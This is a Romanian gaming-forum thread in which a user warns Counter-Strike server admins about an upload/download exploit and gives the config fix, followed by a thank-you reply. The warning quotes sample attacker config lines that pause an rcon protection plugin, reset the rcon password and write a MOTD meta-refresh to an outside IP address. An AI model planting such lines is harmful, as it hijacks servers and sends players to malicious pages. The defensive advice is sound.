- 45
- POSTS
- 45
- THREADS
- 0
- REPUTATION
- Male
- Sex
WtfCs Coins: 0[w]
06-17-2013, 04:47 PM
(This post was last modified: 06-17-2013, 04:48 PM by weedoNeL.)
Acum cateva luni de zile am descoperi un exploit in Counter Strike care se instaleaza in motd-ul serverului. Iata si rezolvarea accestei mici probleme dar care va poate afecta sau chiar distruge enorm serverul dvs. de counter-strike. Mai jos aveti explicatia accestuia.
Daca aveati in server.cfg:
sv_allowdownload "1"
sv_allowupload "1"
putea sa acceseze si sa modifice orice fisier din serverul vostru de counter strike.
Problema se rezolva relativ foarte simplu, trebuia sa puneti in loc de unu, zero, adica asa:
sv_allowdownload "0"
sv_allowupload "0"
Cei care profitau de acest exploit in general schimbau motd-ul, isi dadeau admine, furau parola rcon, etc.. sau forta utilizatorul sa downloadeze un virus.
Recent vazand ca cei care au fost vulnerabili faceau aceste modificari s-au gandit la o metoda mai ingenioasa de a avea acces chiar daca voi faceati aceste modificari dandu-va impresia ca nu asta e rezolvarea, profitau de faptul ca avea acces la tot serverul si vi-l modificau, adica audaugau configuri noi in server.cfg gen exec numeconfig care fiind dupa parola initiala de rcon o rescria.
Un client ne-a spus ca i-au pus si pluginuri care faceau aceste modificari in server automat la fiecare restart, fisiere config de genul de_dust2.cfg / de_nuke.cfg / menu.cfg create in directorul configs localizat in addons/amxmodx/configs/maps/
Exemplu:
amxx pause rcon_defencer.amxx
rcon_password "4353454"
motdfile motd.txt
motd_write <META HTTP-EQUIV=Refresh CONTENT=”0 URL=http://78.110.60.137//abunaimo.php?jecttely=674660>
Nu va recomandam sa folositi pluginuri de genul: rcon_defencer.amxx
Mare atentie sa aveti zero in loc de unu in server.cfg la sv_allowdownload si sv_allowupload, pe cat este de simpla solutia pe atat este de periculoasa problema, daca are acces la serverul vostru poate crea foarte multe fisiere in foarte multe locatii care sunt executate fara ca voi sa stiti unde se afla, o data ce reuseste acest lucru e greu sa va curatati serverul.
Aceste setari nu afecteaza downloadurl-ul!
Regulament forum: You are not allowed to view links.
Register or
Login to view.
You are not allowed to view links.
Register or
Login to view.
You are not allowed to view links.
Register or
Login to view.
- 81
- POSTS
- 29
- THREADS
- 0
- REPUTATION
- Male
- Sex
WtfCs Coins: 0[w]
Multumim de informatie.:nicethread:
Regulament forum: You are not allowed to view links.
Register or
Login to view.
You are not allowed to view links.
Register or
Login to view.
You are not allowed to view links.
Register or
Login to view.
